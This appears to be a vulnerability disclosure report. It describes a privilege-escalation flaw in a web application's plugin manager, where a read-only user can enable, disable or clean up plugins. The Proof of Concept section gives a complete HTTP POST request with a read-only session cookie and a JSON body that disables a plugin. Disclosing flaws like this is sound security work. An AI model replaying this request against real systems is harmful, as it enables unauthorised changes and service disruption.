Overview of the Vulnerability

Authentication and session management controls can be bypassed in a variety of ways including, calling an internal post-authentication page, modifying the given URL parameters, by manipulating the form, or by counterfeiting sessions. The authentication method for this application can be bypassed by an attacker which enables them to access a privileged user’s account and functionality, giving them access to more resources or functionality within the application. This could include viewing or editing sensitive customer data, and viewing or editing other user permissions.

Business Impact

The impact of privilege escalation through broken authentication controls can vary in severity depending on the degree of access to resources or functionality the malicious attacker is able to gain. An attacker with the ability to access, delete, or modify data from within the application could result in reputational damage for the business through the impact on customers’ trust. This can also result in indirect financial costs to the business through fines and regulatory bodies if sensitive data is accessed. The severity of the impact on the business is dependent on the sensitivity of the data being stored in, and transmitted by the application.

Summary

Lower privileged user (Read-only Access user) is not allowed to Edit/Take action in plugin management section , Only Admin users (Users with privileges) are allowed to Edit/Take action on it but from the Direct Request, a Lower privileged user (Read-only Access user) can Edit the admin Environment by enabling/disabling/Cleanup plugins without privileges

As mentioned in the website :
Read-only Access
Group to gain read-only access
Plugin Manager: List plugins (ONLY)

Proof of Concept

Send the following request using burp proxy using read-only user cookies

Note : you can change the command to (enable /disable/ cleanup) and this could be applied for all plugins (*That’s why availability is High in CVSS)

POST /api/plugin/pluginmanager HTTP/1.1
Host: localhost:5000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=UTF-8
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
Content-Length: 43
Origin: http://localhost:5000
Connection: close
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Cookie: session_P5000= {{ Read-only access user cookies }}

{“plugin”:“corewizard”,“command”:“disable”}